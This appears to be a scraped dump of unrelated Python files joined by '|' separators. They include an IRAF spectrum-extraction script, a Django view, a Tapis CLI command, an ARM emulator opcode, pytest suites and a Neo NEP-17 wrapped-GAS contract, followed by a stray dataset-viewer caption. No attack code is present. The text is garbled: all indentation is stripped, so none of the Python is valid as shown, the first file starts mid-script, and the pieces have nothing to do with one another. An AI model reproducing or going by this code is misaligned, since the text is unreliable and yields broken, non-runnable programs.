print("Settings for blue side will be used.")
disp_axis = 1
elif side == "Red":
print("Settings for red side will be used.")
disp_axis = 1
else:
disp_axis = str(raw_input("Dispersion axis: 1 for line; 2 for column."))
print('Loading IRAF packages ...')
iraf.imred()
iraf.ccdred()
iraf.twodspec()
iraf.apextract()
print('unlearning previous settings...')
iraf.ccdred.unlearn()
iraf.ccdred.ccdproc.unlearn()
iraf.ccdred.combine.unlearn()
iraf.apextract.apall.unlearn()
iraf.apextract.dispaxis = disp_axis
iraf.apextract.verbose = 'no'
print('Extracting object aperture spectrum...')
iraf.apextract.apall.unlearn()
iraf.apextract.apall.readnoise = 3.5
iraf.apextract.apall.gain = 1.5
iraf.apextract.apall.format = 'multispec'
iraf.apextract.apall.interac = True
iraf.apextract.apall.find = True
iraf.apextract.apall.recente = True
iraf.apextract.apall.resize = True
iraf.apextract.apall.edit = True
iraf.apextract.apall.trace = True
iraf.apextract.apall.fittrac = True
iraf.apextract.apall.extract = True
iraf.apextract.apall.extras = True
iraf.apextract.apall.review = True
iraf.apextract.apall.background = 'fit'
iraf.apextract.apall.pfit = 'fit2d'
iraf.apextract.apall.weights = 'variance'
iraf.apextract.apall(input='crf_//@'+objlist, output='acrf_//@'+objlist)
print('--- DONE ---')
|
# coding: utf-8
# flake8: noqa
from __future__ import absolute_import
# import models into model package
from swagger_server.models.model_flow_chart import ModelFlowChart
from swagger_server.models.model_flow_chart_edge import ModelFlowChartEdge
from swagger_server.models.model_flow_chart_edge_meta import ModelFlowChartEdgeMeta
from swagger_server.models.model_flow_chart_extension import ModelFlowChartExtension
from swagger_server.models.model_flow_chart_extension_fixed_config import ModelFlowChartExtensionFixedConfig
from swagger_server.models.model_flow_chart_extension_meta import ModelFlowChartExtensionMeta
from swagger_server.models.model_flow_chart_graph import ModelFlowChartGraph
from swagger_server.models.model_flow_chart_meta import ModelFlowChartMeta
from swagger_server.models.model_flow_chart_node import ModelFlowChartNode
from swagger_server.models.model_flow_chart_node_component import ModelFlowChartNodeComponent
from swagger_server.models.model_flow_chart_node_component_meta import ModelFlowChartNodeComponentMeta
from swagger_server.models.model_flow_chart_node_linked_edges import ModelFlowChartNodeLinkedEdges
from swagger_server.models.model_flow_chart_node_meta import ModelFlowChartNodeMeta
|
#!/usr/bin/python
"""
Setup tools script for Site-RM Utilities. This is mandatory for Frontend
and the agents to have this installed.
To Install:
python setup-agent.py build install
Copyright 2019 California Institute of Technology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Title : dtnrm
Author : Justas Balcas
Email : justas.balcas (at) cern.ch
@Copyright : Copyright (C) 2019 California Institute of Technology
Date : 2019/05/26
"""
from setuptools import setup
from setupUtilities import list_packages, get_py_modules
setup(
name='DTNRM-Utilities',
version="0.1",
long_description="DTN-RM Utilities Installation",
author="Justas Balcas",
author_email="justas.balcas@cern.ch",
url="http://hep.caltech.edu",
download_url="https://github.com/sdn-sense/dtnrm-utilities",
keywords=['DTN-RM', 'system', 'monitor', 'SDN', 'end-to-end'],
install_requires=['pyOpenSSL==17.5.0'],
package_dir={'': 'src/python/'},
packages=['DTNRMLibs'] + list_packages(['src/python/DTNRMLibs/']),
py_modules=get_py_modules(['src/python/DTNRMLibs']),
)
|
#Non project imports
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
#Project imports
from GuildPosts.models import PostModel
from UserProfiles.models import UserProfileModel
from GroupChat.models import Message
from GroupChat.forms import ChatModelForm
from Notifications.models import Notification
from GuildProfiles.models import GuildProfileModel
from .FindUserGuild import FindUserGuild
from GuildPosts.models import Like
# Create your views here.
def Discover(request):
PostList = PostModel.objects.filter()
UserName = request.user.username
NotificationLi = Notification.objects.filter(UserNotify = request.user)
MessageList = Message.objects.filter(GuildId = FindUserGuild(request.user.id))
Temp = []
Temp2 = []
FullList = []
if request.method == 'POST':
form = ChatModelForm(request.POST)
if form.is_valid():
Chat = Message()
Chat.UserId = request.user
Chat.GuildId = FindUserGuild(request.user.id)
Chat.MessageBody = form.cleaned_data['MessageBody']
Chat.ProfId = UserProfileModel.objects.get(UserProfileRelation = request.user)
Chat.save()
else:
form = ChatModelForm()
for k in PostList:
try:
Temp.append(k.PostGuildProfile.GuildProfileImage)
except:
Temp.append("")
Temp.append(k.PostGuild.GuildName)
Temp.append(k.PostDate)
Temp.append(k.PostBody)
Temp.append(k.PostLink)
Temp.append(len(Like.objects.filter(PostRelation=k)))
try:
Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser1)))
except:
pass
try:
Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser2)))
except:
pass
try:
Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser3)))
except:
pass
try:
Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser4)))
except:
pass
try:
Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser5)))
except:
pass
Temp.append(Temp2)
FullList.append(Temp)
Temp = []
Temp2 = []
return render(request, 'Discover/Discover.html', {'FullList':FullList,'form':form, 'NotificationLi':NotificationLi, 'MessageList':MessageList,'PostList':PostList, 'UserName':request.user.username})
|
from tapis_cli.display import Verbosity
from .create import MetadataCreate
from .formatters import MetadataFormatOne
from .helpers import create_update, generate_name
from .models import Metadata
from .mixins import MetadataUUID
from .mixins import UploadMetadataFile
from . import API_NAME, SERVICE_VERSION
class MetadataUpdate(MetadataFormatOne, UploadMetadataFile, MetadataUUID):
HELP_STRING = 'Update an existing Metadata document by UUID'
LEGACY_COMMMAND_STRING = 'metadata-addupdate'
VERBOSITY = Verbosity.RECORD
EXTRA_VERBOSITY = Verbosity.RECORD_VERBOSE
def get_parser(self, prog_name):
parser = super(MetadataUpdate, self).get_parser(prog_name)
name_group = parser.add_mutually_exclusive_group(required=False)
parser.add_argument('-V',
'--value',
dest='meta_value',
metavar='VALUE',
help='Value for the document')
name_group.add_argument('-N',
'--rename',
dest='meta_name',
metavar='NEW_NAME',
help='Rename document')
parser = UploadMetadataFile.extend_parser(self, parser)
parser = MetadataUUID.extend_parser(self, parser)
return parser
def take_action(self, parsed_args):
parsed_args = self.preprocess_args(parsed_args)
self.requests_client.setup(API_NAME, SERVICE_VERSION, 'data')
self.update_payload(parsed_args)
self.handle_file_upload(parsed_args)
identifier = MetadataUUID.get_identifier(self, parsed_args)
body = None
if self.json_file_contents != {} and parsed_args.meta_value is not None:
raise RuntimeError(
'Specifing both --value and -F options is not supported.')
# Blindly accept the JSON file if passed. Otherwise construct a
# name/value record, generating the name if needed.
if self.json_file_contents != {}:
body = self.json_file_contents
else:
# Fetch
doc = self.tapis_client.meta.getMetadata(uuid=identifier)
body = {
'name': doc.get('name'),
'value': doc.get('value'),
'associationIds': doc.get('associationIds', [])
}
if parsed_args.meta_name is not None:
body['name'] = parsed_args.meta_name
if parsed_args.meta_value is not None:
body['value'] = parsed_args.meta_value
headers = self.render_headers(Metadata, parsed_args)
rec = self.tapis_client.meta.updateMetadata(body=body, uuid=identifier)
data = []
for key in headers:
val = self.render_value(rec.get(key, None))
data.append(val)
return (tuple(headers), tuple(data))
|
from armulator.armv6.opcodes.abstract_opcode import AbstractOpcode
from bitstring import BitArray
class Usad8(AbstractOpcode):
def __init__(self, m, d, n):
super(Usad8, self).__init__()
self.m = m
self.d = d
self.n = n
def execute(self, processor):
if processor.condition_passed():
absdiff1 = abs(
processor.registers.get(self.n)[24:32].uint - processor.registers.get(self.m)[24:32].uint)
absdiff2 = abs(
processor.registers.get(self.n)[16:24].uint - processor.registers.get(self.m)[16:24].uint)
absdiff3 = abs(
processor.registers.get(self.n)[8:16].uint - processor.registers.get(self.m)[8:16].uint)
absdiff4 = abs(
processor.registers.get(self.n)[0:8].uint - processor.registers.get(self.m)[0:8].uint)
result = absdiff1 + absdiff2 + absdiff3 + absdiff4
processor.registers.set(self.d, BitArray(uint=result, length=32))
|
'''
Plot predictions of a selected sequence from Caltech Pedestrian Dataset (Dollar et al. 2009, http://www.vision.caltech.edu/Image_Datasets/CaltechPedestrians/) outputted by trained PreCNet.
Based on code related to PredNet - Lotter et al. 2016 (https://arxiv.org/abs/1605.08104 https://github.com/coxlab/prednet).
'''
import os
import numpy as np
from six.moves import cPickle
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from keras.models import load_model
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Input, Dense, Flatten
from precnet import PreCNet
from data_utils import SequenceGenerator
#choose model (trained on kitti/bdd_large(2M)/bdd_small(41K))
#from kitti_settings import *
from bdd_large_settings import *
#from bdd_small_settings import *
import tensorflow as tf
import hickle as hkl
batch_size = 1
start_img = 18648
end_img = 18658
#other sequences from the article (figures)
#start_img = 18912
#end_img = 18922
#
#start_img = 39749
#end_img = 39759
#
#start_img = 39809
#end_img = 39819
#
#start_img = 5522
#end_img = 5532
#
#start_img = 38915
#end_img = 38925
#
#start_img = 1180
#end_img = 1190
#
#start_img = 18648
#end_img = 18658
#
#start_img = 8347
#end_img = 8357
#
#start_img = 493
#end_img = 503
nt = end_img-start_img+1
data_file = os.path.join(DATA_DIR, 'X_pedest_test.hkl')
source_file = os.path.join(DATA_DIR, 'sources_pedest_test.hkl')
#choose model (trained on kitti/bdd_large(2M)/bdd_small(41K))
#model_file = os.path.join(WEIGHTS_DIR, 'precnet_kitti_model.1000.h5')
model_file = os.path.join(WEIGHTS_DIR, 'precnet_bdd100k_model.10000.h5')
#model_file = os.path.join(WEIGHTS_DIR, 'precnet_bdd100k_model.1000.h5')
X = hkl.load(data_file)
X=X.astype(np.float32) / 255
sources = hkl.load(source_file)
train_model=load_model(model_file,custom_objects = {'PreCNet': PreCNet})
# Create testing model (to output predictions)
layer_config = train_model.layers[1].get_config()
layer_config['output_mode'] = 'prediction'
data_format = layer_config['data_format'] if 'data_format' in layer_config else layer_config['dim_ordering']
test_precnet = PreCNet(weights=train_model.layers[1].get_weights(), **layer_config)
input_shape = list(train_model.layers[0].batch_input_shape[1:])
input_shape[0] = nt
inputs = Input(shape=tuple(input_shape))
predictions = test_precnet(inputs)
test_model = Model(inputs=inputs, outputs=predictions)
X_test_tmp=[]
X_test=[]
for i in range(start_img,end_img+1):
X_test_tmp.append(X[i])
X_test.append(X_test_tmp)
X_test=np.array(X_test)
X_hat = test_model.predict(X_test, batch_size)
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
plot_save_dir = os.path.join(RESULTS_SAVE_DIR, 'prediction_selected_plots_pedest/')
from PIL import Image
if not os.path.exists(RESULTS_SAVE_DIR): os.mkdir(RESULTS_SAVE_DIR)
if not os.path.exists(plot_save_dir): os.mkdir(plot_save_dir)
for t in range(nt):
if t==0:
act_tmp=X_test[0,t]
pred_tmp=X_hat[0,t]
else:
act_tmp=np.concatenate((act_tmp, X_test[0,t]), 1)
pred_tmp=np.concatenate((pred_tmp, X_hat[0,t]), 1)
conc_im=np.concatenate((act_tmp, pred_tmp), 0)
im = Image.fromarray((conc_im * 255).astype(np.uint8))
im.save(plot_save_dir + 'plot_caltech' + str(start_img) + '-' + str(end_img) + '.png')
|
import asynctest
import pytest
from jsondaora import dataclasses
@pytest.mark.asyncio
async def test_should_set_already_not_found_error_when_get_many_with_fields(
repository, mocker
):
fake_entity = 'fake'
repository.memory_data_source.hmget = asynctest.CoroutineMock(
return_value=[None, None, None]
)
repository.memory_data_source.exists = asynctest.CoroutineMock(
side_effect=[False]
)
repository.fallback_data_source.get = asynctest.CoroutineMock(
return_value=None
)
repository.memory_data_source.set = asynctest.CoroutineMock()
repository.memory_data_source.hmset = asynctest.CoroutineMock()
assert [
e
async for e in repository.query(
many=[fake_entity], fields=['id', 'integer', 'inner_entities']
).entities
] == []
assert repository.memory_data_source.hmget.call_args_list == [
mocker.call('fake:fake', 'id', 'integer', 'inner_entities'),
]
assert repository.memory_data_source.exists.call_args_list == [
mocker.call('fake:not-found:fake')
]
assert repository.fallback_data_source.get.call_args_list == [
mocker.call('fake:fake')
]
assert repository.memory_data_source.set.call_args_list == [
mocker.call('fake:not-found:fake', '1')
]
assert not repository.memory_data_source.hmset.called
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_with_fields(
repository, fake_entity
):
await repository.memory_data_source.delete('fake:fake')
await repository.memory_data_source.delete('fake:not-found:fake')
repository.fallback_data_source.db['fake:fake'] = dataclasses.asdict(
fake_entity
)
fake_entity.number = None
fake_entity.boolean = None
entities = [
e
async for e in repository.query(
many=[fake_entity.id], fields=['id', 'integer', 'inner_entities']
).entities
]
assert entities == [fake_entity]
assert repository.memory_data_source.exists('fake:fake')
|
from pathlib import Path
import logging
import yaml
def load_config(config_path, section):
"""Tests for a valid config file and loads a section of the yaml file,
or if not specified, the entire configuration
"""
config_path = Path(config_path)
# config path needs to be a valid yaml file that exists
# logging for config_path
if not config_path.exists:
logging.warn(f'Config path f{config_path} does not exist! Ignoring Path')
elif config_path.suffix != '.yaml':
logging.warn(f'Config Path not a valid yaml file')
# Succesful config_path
else:
logging.debug(f'Config Path: {config_path} found. Loading...')
config = yaml.safe_load(config_path.read_text())
if section in config:
return config[section]
else:
return config
|
# Copyright 2018 University of Groningen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for the :mod:`vermouth.processors.average_beads` module.
"""
import pytest
import networkx as nx
import numpy as np
from vermouth.processors import average_beads
@pytest.fixture
def mol_with_subgraph():
"""
Create a molecule with a subgraph under the "graph" attribute of each node.
"""
mol = nx.OrderedGraph()
subgraph = nx.Graph()
subgraph.add_nodes_from((
(0, {'mass': 1.1, 'not mass': 2.1, 'position': np.array([1, 2, 3], dtype=float),}),
(1, {'mass': 1.2, 'not mass': 2.2, 'position': np.array([2, 3, 4], dtype=float),}),
(2, {'mass': 1.3, 'not mass': 2.3, 'position': np.array([3, 4, 5], dtype=float),}),
))
mol.add_node(0, **{
"graph": subgraph,
"mapping_weights": {0: 1, 1: 2, 2: 3},
"target mass": np.array([2.378378378, 3.378378378, 4.378378378]),
"target not mass": np.array([2.358208955, 3.358208955, 4.358208955]),
"target None": np.array([2.333333333, 3.333333333, 4.333333333]),
"target False": np.array([2.333333333, 3.333333333, 4.333333333]),
})
subgraph = nx.Graph()
subgraph.add_nodes_from((
(0, {'mass': 1.2, 'not mass': 2.2, 'position': np.array([2, 3, 4], dtype=float),}),
(1, {'mass': 1.3, 'not mass': 2.3, 'position': np.array([3, 4, 5], dtype=float),}),
))
mol.add_node(1, **{
"graph": subgraph,
"mapping_weights": {0: 2, 1: 3},
"target mass": np.array([2.619047619, 3.619047619, 4.619047619]),
"target not mass": np.array([2.610619469, 3.610619469, 4.610619469]),
"target None": np.array([2.6, 3.6, 4.6]),
"target False": np.array([2.6, 3.6, 4.6]),
})
subgraph = nx.Graph()
mol.add_node(2, **{
"graph": subgraph,
"mapping_weights": {},
"target mass": np.array([np.nan, np.nan, np.nan]),
"target not mass": np.array([np.nan, np.nan, np.nan]),
"target None": np.array([np.nan, np.nan, np.nan]),
"target False": np.array([np.nan, np.nan, np.nan]),
})
subgraph = nx.Graph()
subgraph.add_nodes_from((
(0, {'mass': 1.2, 'not mass': 2.2, 'position': np.array([2, 3, 4], dtype=float),}),
(1, {'mass': 1.3, 'not mass': 2.3, 'position': np.array([3, 4, 5], dtype=float),}),
))
mol.add_node(3, **{
"graph": subgraph,
"mapping_weights": {0: 0, 1: 0},
"target mass": np.array([np.nan, np.nan, np.nan]),
"target not mass": np.array([np.nan, np.nan, np.nan]),
"target None": np.array([np.nan, np.nan, np.nan]),
"target False": np.array([np.nan, np.nan, np.nan]),
})
return mol
@pytest.fixture(params=(None, 'mass', 'not mass'))
def mol_with_variable(request, mol_with_subgraph):
"""
Build a mock molecule with a mock force field declaring 'center_weight'.
"""
weight = request.param
class MockForceField(object):
pass
ff = MockForceField()
ff.variables = {'center_weight': weight}
mol_with_subgraph.force_field = ff
return mol_with_subgraph
@pytest.mark.parametrize('weight', (None, 'mass', 'not mass'))
def test_do_average_bead(mol_with_subgraph, weight):
"""
Test normal operation of :func:`average_beads.do_average_bead`.
"""
result_mol = average_beads.do_average_bead(
mol_with_subgraph, ignore_missing_graphs=False, weight=weight,
)
target_key = 'target {}'.format(weight)
target_positions = np.stack([node[target_key] for node in mol_with_subgraph.nodes.values()])
positions = np.stack([node['position'] for node in mol_with_subgraph.nodes.values()])
assert np.allclose(positions, target_positions, equal_nan=True)
@pytest.mark.parametrize('weight', ('mass', 'not mass'))
def test_shoot_weight(mol_with_subgraph, weight):
"""
Test that :func:`average_beads.do_average_bead` fails if a weight is missing.
"""
del mol_with_subgraph.nodes[0]['graph'].nodes[1][weight]
with pytest.raises(KeyError):
average_beads.do_average_bead(
mol_with_subgraph, ignore_missing_graphs=False, weight=weight,
)
def test_shoot_graph(mol_with_subgraph):
"""
Test that :func:`average_beads.do_average_bead` fails if a subgraph is missing.
"""
del mol_with_subgraph.nodes[1]['graph']
with pytest.raises(ValueError):
average_beads.do_average_bead(mol_with_subgraph)
def test_processor_variable(mol_with_variable):
processor = average_beads.DoAverageBead()
mol = processor.run_molecule(mol_with_variable)
weight = mol_with_variable.force_field.variables['center_weight']
target_key = 'target {}'.format(weight)
target_positions = np.stack([node[target_key] for node in mol_with_variable.nodes.values()])
positions = np.stack([node['position'] for node in mol_with_variable.nodes.values()])
assert np.allclose(positions, target_positions, equal_nan=True)
@pytest.mark.parametrize('weight', (False, 'mass', 'not mass'))
def test_processor_weight(mol_with_variable, weight):
processor = average_beads.DoAverageBead(weight=weight)
mol = processor.run_molecule(mol_with_variable)
target_key = 'target {}'.format(weight)
target_positions = np.stack([node[target_key] for node in mol_with_variable.nodes.values()])
positions = np.stack([node['position'] for node in mol_with_variable.nodes.values()])
assert np.allclose(positions, target_positions, equal_nan=True)
|
from typing import Any, Union
from boa3.builtin import CreateNewEvent, NeoMetadata, metadata, public
from boa3.builtin.contract import Nep17TransferEvent, abort
from boa3.builtin.interop.blockchain import get_contract
from boa3.builtin.interop.contract import GAS, call_contract
from boa3.builtin.interop.runtime import calling_script_hash, check_witness, executing_script_hash
from boa3.builtin.interop.storage import delete, get, put
from boa3.builtin.type import UInt160
# -------------------------------------------
# METADATA
# -------------------------------------------
@metadata
def manifest_metadata() -> NeoMetadata:
"""
Defines this smart contract's metadata information
"""
meta = NeoMetadata()
meta.supported_standards = ['NEP-17']
meta.author = "Mirella Medeiros, Ricardo Prado and Lucas Uezu. COZ in partnership with Simpli"
meta.description = "Wrapped GAS Example"
meta.email = "contact@coz.io"
return meta
# -------------------------------------------
# TOKEN SETTINGS
# -------------------------------------------
# Script hash of the contract owner
OWNER = UInt160()
SUPPLY_KEY = 'totalSupply'
# Symbol of the Token
TOKEN_SYMBOL = 'zGAS'
# Number of decimal places
TOKEN_DECIMALS = 8
# Total Supply of tokens in the system
TOKEN_TOTAL_SUPPLY = 10_000_000 * 100_000_000 # 10m total supply * 10^8 (decimals)
# Allowance
ALLOWANCE_PREFIX = b'allowance'
# -------------------------------------------
# Events
# -------------------------------------------
on_transfer = Nep17TransferEvent
on_approval = CreateNewEvent(
[
('owner', UInt160),
('spender', UInt160),
('amount', int)
],
'Approval'
)
# -------------------------------------------
# Methods
# -------------------------------------------
@public
def symbol() -> str:
"""
Gets the symbols of the token.
This string must be valid ASCII, must not contain whitespace or control characters, should be limited to uppercase
Latin alphabet (i.e. the 26 letters used in English) and should be short (3-8 characters is recommended).
This method must always return the same value every time it is invoked.
:return: a short string representing symbol of the token managed in this contract.
"""
return TOKEN_SYMBOL
@public
def decimals() -> int:
"""
Gets the amount of decimals used by the token.
E.g. 8, means to divide the token amount by 100,000,000 (10 ^ 8) to get its user representation.
This method must always return the same value every time it is invoked.
:return: the number of decimals used by the token.
"""
return TOKEN_DECIMALS
@public
def totalSupply() -> int:
"""
Gets the total token supply deployed in the system.
This number must not be in its user representation. E.g. if the total supply is 10,000,000 tokens, this method
must return 10,000,000 * 10 ^ decimals.
:return: the total token supply deployed in the system.
"""
return get(SUPPLY_KEY).to_int()
@public
def balanceOf(account: UInt160) -> int:
"""
Get the current balance of an address.
The parameter account must be a 20-byte address represented by a UInt160.
:param account: the account address to retrieve the balance for
:type account: bytes
"""
assert len(account) == 20
return get(account).to_int()
@public
def transfer(from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool:
"""
Transfers an amount of zGAS tokens from one account to another.
If the method succeeds, it must fire the `Transfer` event and must return true, even if the amount is 0,
or from and to are the same address.
:param from_address: the address to transfer from
:type from_address: UInt160
:param to_address: the address to transfer to
:type to_address: UInt160
:param amount: the amount of zGAS tokens to transfer
:type amount: int
:param data: whatever data is pertinent to the onPayment method
:type data: Any
:return: whether the transfer was successful
:raise AssertionError: raised if `from_address` or `to_address` length is not 20 or if `amount` is less than zero.
"""
# the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
assert len(from_address) == 20 and len(to_address) == 20
# the parameter amount must be greater than or equal to 0. If not, this method should throw an exception.
assert amount >= 0
# The function MUST return false if the from account balance does not have enough tokens to spend.
from_balance = get(from_address).to_int()
if from_balance < amount:
return False
# The function should check whether the from address equals the caller contract hash.
# If so, the transfer should be processed;
# If not, the function should use the check_witness to verify the transfer.
if from_address != calling_script_hash:
if not check_witness(from_address):
return False
# skip balance changes if transferring to yourself or transferring 0 cryptocurrency
if from_address != to_address and amount != 0:
if from_balance == amount:
delete(from_address)
else:
put(from_address, from_balance - amount)
to_balance = get(to_address).to_int()
put(to_address, to_balance + amount)
# if the method succeeds, it must fire the transfer event
on_transfer(from_address, to_address, amount)
# if the to_address is a smart contract, it must call the contracts onPayment
post_transfer(from_address, to_address, amount, data, True)
# and then it must return true
return True
@public
def transfer_from(spender: UInt160, from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool:
"""
A spender transfers an amount of zGAS tokens allowed from one account to another.
If the method succeeds, it must fire the `Transfer` event and must return true, even if the amount is 0,
or from and to are the same address.
:param spender: the address that is trying to transfer zGAS tokens
:type spender: UInt160
:param from_address: the address to transfer from
:type from_address: UInt160
:param to_address: the address to transfer to
:type to_address: UInt160
:param amount: the amount of zGAS tokens to transfer
:type amount: int
:param data: whatever data is pertinent to the onPayment method
:type data: Any
:return: whether the transfer was successful
:raise AssertionError: raised if `spender`, `from_address` or `to_address` length is not 20 or if `amount` if less
than zero.
"""
# the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
assert len(spender) == 20 and len(from_address) == 20 and len(to_address) == 20
# the parameter amount must be greater than or equal to 0. If not, this method should throw an exception.
assert amount >= 0
# The function MUST return false if the from account balance does not have enough tokens to spend.
from_balance = get(from_address).to_int()
if from_balance < amount:
return False
# The function MUST return false if the from account balance does not allow enough tokens to be spent by the spender.
allowed = allowance(from_address, spender)
if allowed < amount:
return False
# The function should check whether the spender address equals the caller contract hash.
# If so, the transfer should be processed;
# If not, the function should use the check_witness to verify the transfer.
if spender != calling_script_hash:
if not check_witness(spender):
return False
if allowed == amount:
delete(ALLOWANCE_PREFIX + from_address + spender)
else:
put(ALLOWANCE_PREFIX + from_address + spender, allowed - amount)
# skip balance changes if transferring to yourself or transferring 0 cryptocurrency
if from_address != to_address and amount != 0:
if from_balance == amount:
delete(from_address)
else:
put(from_address, from_balance - amount)
to_balance = get(to_address).to_int()
put(to_address, to_balance + amount)
# if the method succeeds, it must fire the transfer event
on_transfer(from_address, to_address, amount)
# if the to_address is a smart contract, it must call the contracts onPayment
post_transfer(from_address, to_address, amount, data, True)
# and then it must return true
return True
@public
def approve(spender: UInt160, amount: int) -> bool:
"""
Allows spender to spend from your account as many times as they want until it reaches the amount allowed.
The allowed amount will be overwritten if this method is called once more.
:param spender: the address that will be allowed to use your zGAS
:type spender: UInt160
:param amount: the total amount of zGAS that the spender can spent
:type amount: int
:raise AssertionError: raised if `from_address` length is not 20 or if `amount` if less than zero.
"""
assert len(spender) == 20
assert amount >= 0
if balanceOf(calling_script_hash) >= amount:
put(ALLOWANCE_PREFIX + calling_script_hash + spender, amount)
on_approval(calling_script_hash, spender, amount)
return True
return False
@public
def allowance(owner: UInt160, spender: UInt160) -> int:
"""
Gets the amount of zGAS from the owner that can be used by the spender.
:param owner: the address that allowed the spender to spend zGAS
:type owner: UInt160
:param spender: the address that can spend zGAS from the owner's account
:type spender: UInt160
"""
return get(ALLOWANCE_PREFIX + owner + spender).to_int()
def post_transfer(from_address: Union[UInt160, None], to_address: Union[UInt160, None], amount: int, data: Any, call_onPayment: bool):
"""
Checks if the one receiving NEP17 tokens is a smart contract and if it's one the onPayment method will be called.
:param from_address: the address of the sender
:type from_address: UInt160
:param to_address: the address of the receiver
:type to_address: UInt160
:param amount: the amount of cryptocurrency that is being sent
:type amount: int
:param data: any pertinent data that might validate the transaction
:type data: Any
:param call_onPayment: whether onPayment should be called or not
:type call_onPayment: bool
"""
if call_onPayment:
if not isinstance(to_address, None): # TODO: change to 'is not None' when `is` semantic is implemented
contract = get_contract(to_address)
if not isinstance(contract, None): # TODO: change to 'is not None' when `is` semantic is implemented
call_contract(to_address, 'onNEP17Payment', [from_address, amount, data])
def mint(account: UInt160, amount: int):
"""
Mints new zGAS tokens.
:param account: the address of the account that is sending cryptocurrency to this contract
:type account: UInt160
:param amount: the amount of gas to be refunded
:type amount: int
:raise AssertionError: raised if amount is less than than 0
"""
assert amount >= 0
if amount != 0:
current_total_supply = totalSupply()
account_balance = balanceOf(account)
put(SUPPLY_KEY, current_total_supply + amount)
put(account, account_balance + amount)
on_transfer(None, account, amount)
post_transfer(None, account, amount, None, True)
@public
def burn(account: UInt160, amount: int):
"""
Burns zGAS tokens.
:param account: the address of the account that is pulling out cryptocurrency of this contract
:type account: UInt160
:param amount: the amount of gas to be refunded
:type amount: int
:raise AssertionError: raised if `account` length is not 20, amount is less than than 0 or the account doesn't have
enough zGAS to burn
"""
assert len(account) == 20
assert amount >= 0
if check_witness(account):
if amount != 0:
current_total_supply = totalSupply()
account_balance = balanceOf(account)
assert account_balance >= amount
put(SUPPLY_KEY, current_total_supply - amount)
if account_balance == amount:
delete(account)
else:
put(account, account_balance - amount)
on_transfer(account, None, amount)
post_transfer(account, None, amount, None, False)
call_contract(GAS, 'transfer', [executing_script_hash, account, amount, None])
@public
def verify() -> bool:
"""
When this contract address is included in the transaction signature,
this method will be triggered as a VerificationTrigger to verify that the signature is correct.
For example, this method needs to be called when withdrawing token from the contract.
:return: whether the transaction signature is correct
"""
return check_witness(OWNER)
@public
def deploy() -> bool:
"""
Initializes the storage when the smart contract is deployed.
:return: whether the deploy was successful. This method must return True only during the smart contract's deploy.
"""
if not check_witness(OWNER):
return False
if get(SUPPLY_KEY).to_int() > 0:
return False
put(SUPPLY_KEY, TOKEN_TOTAL_SUPPLY)
put(OWNER, TOKEN_TOTAL_SUPPLY)
on_transfer(None, OWNER, TOKEN_TOTAL_SUPPLY)
return True
@public
def onNEP17Payment(from_address: UInt160, amount: int, data: Any):
"""
If this smart contract receives GAS, it will mint an amount of wrapped GAS
:param from_address: the address of the one who is trying to send cryptocurrency to this smart contract
:type from_address: UInt160
:param amount: the amount of cryptocurrency that is being sent to the this smart contract
:type amount: int
:param data: any pertinent data that might validate the transaction
:type data: Any
"""
# Use calling_script_hash to identify if the incoming token is GAS
if calling_script_hash == GAS:
mint(from_address, amount)
else:
abort()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.